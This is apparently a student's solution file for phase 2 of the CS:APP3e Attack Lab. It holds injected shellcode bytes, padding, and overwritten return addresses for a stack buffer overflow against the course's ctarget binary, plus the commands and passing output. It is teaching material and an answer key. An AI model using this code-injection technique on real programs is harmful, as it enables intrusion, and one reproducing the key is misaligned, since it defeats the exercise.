/* Byte codes for the phase 2 of attack bomb in CS:APP3e

   Copyright (C) 2022 Tongjie Liu <tongjieandliu@gmail.com>.

   This program is free software: you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation, either version 3 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program.  If not, see <https://www.gnu.org/licenses/>. */

/*	1. Generate byte codes in this file:
	$ gcc -c phase_2.s
	$ objdump -d phase_2.o
	phase_2.o:     file format elf64-x86-64


	Disassembly of section .text:

	0000000000000000 <.text>:
	   0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
	   7:   58                      pop    %rax
	   8:   50                      push   %rax
	   9:   50                      push   %rax
	   a:   c3                      retq 


	2. Attack with this file:
	$ cat phase_2.txt | ./hex2raw | ./ctarget -q
	Cookie: 0x59b997fa
	Type string:Touch2!: You called touch2(0x59b997fa)
	Valid solution for level 2 with target ctarget
	PASS: Would have posted the following:
		user id bovik
		course  15213-f15
		lab     attacklab
		result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 58
	50 50 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 EC 17 40 00 00 00
	00 00 */
48 c7 c7 fa 97 b9 59 58 /* injected code */
50 50 c3 00 00 00 00 00 /* injected code and zeros */
00 00 00 00 00 00 00 00 /* zeros */
00 00 00 00 00 00 00 00 /* zeros */
00 00 00 00 00 00 00 00 /* zeros */
78 dc 61 55 00 00 00 00 /* address of injected code in little-endian */
ec 17 40 00 00 00 00 00 /* address of touch2 in little-endian */
